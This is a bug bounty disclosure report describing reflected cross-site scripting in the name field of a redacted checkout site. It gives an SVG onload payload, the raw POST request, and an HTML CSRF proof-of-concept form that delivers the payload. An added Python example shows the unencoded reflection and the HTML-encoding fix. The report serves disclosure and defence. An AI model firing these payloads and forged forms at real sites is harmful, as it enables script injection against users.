Reflected Cross Site Scripting

  • Reported to Private
  • Reported by Haqtify
  • Medium (5.1)
  • $400
  • Published 3 years ago

URL:

https://checkout.redacted.com/

Description:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Payload:

'"><svg/onload=alert(1)>

Steps To Reproduce:

1. Go to this URL.

https://checkout.redacted.com/

2. Insert the XSS payload in name.

3. XSS Executed.

REQUEST :

POST /calculate-checkout HTTP/1.1
Host: checkout.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
Upgrade-Insecure-Requests: 1

name=dsdssdsd'"><svg/onload=alert(1)>&practiceName=ffffddf&mobile=%2B44+07366507512&email=email%40gmail.com&plan=STANDARD
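Why the name value above becomes markup, and how output encoding stops it, as an added example that is not part of the original report or the affected application. The template, the function names and the URL-encoded sample body are assumptions; the report does not show the server's real markup.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample: URL-encoded form body modelled on the request above.
BODY = ("name=dsdssdsd%27%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E"
        "&practiceName=ffffddf&plan=STANDARD")

# Hypothetical template: the report does not show the server's real markup.
TEMPLATE = '<form><input type="text" name="name" value="{name}"></form>'


def render_vulnerable(body):
    """Reflect the submitted name into the page without encoding it."""
    return TEMPLATE.format(name=parse_qs(body)["name"][0])


def render_encoded(body):
    """Reflect the same value, HTML-encoded for a quoted attribute."""
    name = parse_qs(body)["name"][0]
    return TEMPLATE.format(name=escape(name, quote=True))


class Collector(HTMLParser):
    """Record every element, event-handler attribute and input value."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers, self.values = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for key, value in attrs:
            if key.startswith("on"):
                self.handlers.append(key)
            if tag == "input" and key == "value":
                self.values.append(value)


def inspect_markup(markup):
    """Parse rendered markup and return (tags, handlers, input values)."""
    collector = Collector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.handlers, collector.values


if __name__ == "__main__":
    for render in (render_vulnerable, render_encoded):
        print(render.__name__, inspect_markup(render(BODY)))
```

With raw reflection the parser sees a third element carrying an event handler; with encoding the whole submitted string stays inside the input's value attribute. A check of this shape can run as a regression test against any template that echoes request fields.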

XSS CSRF POC:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://checkout.redacted.com/calculate-checkout" method="POST">
<input type="hidden" name="name" value="dsdssdsd&apos;&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;1&#41;&gt;" />
<input type="hidden" name="practiceName" value="ffffddf" />
<input type="hidden" name="mobile" value="&#43;44&#32;07366507512" />
<input type="hidden" name="email" value="email&#64;gmail&#46;com" />
<input type="hidden" name="plan" value="STANDARDPRACTICE" />
<input type="hidden" name="integration" value="soe" />
<input type="hidden" name="coupon" value="erererer" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

POC: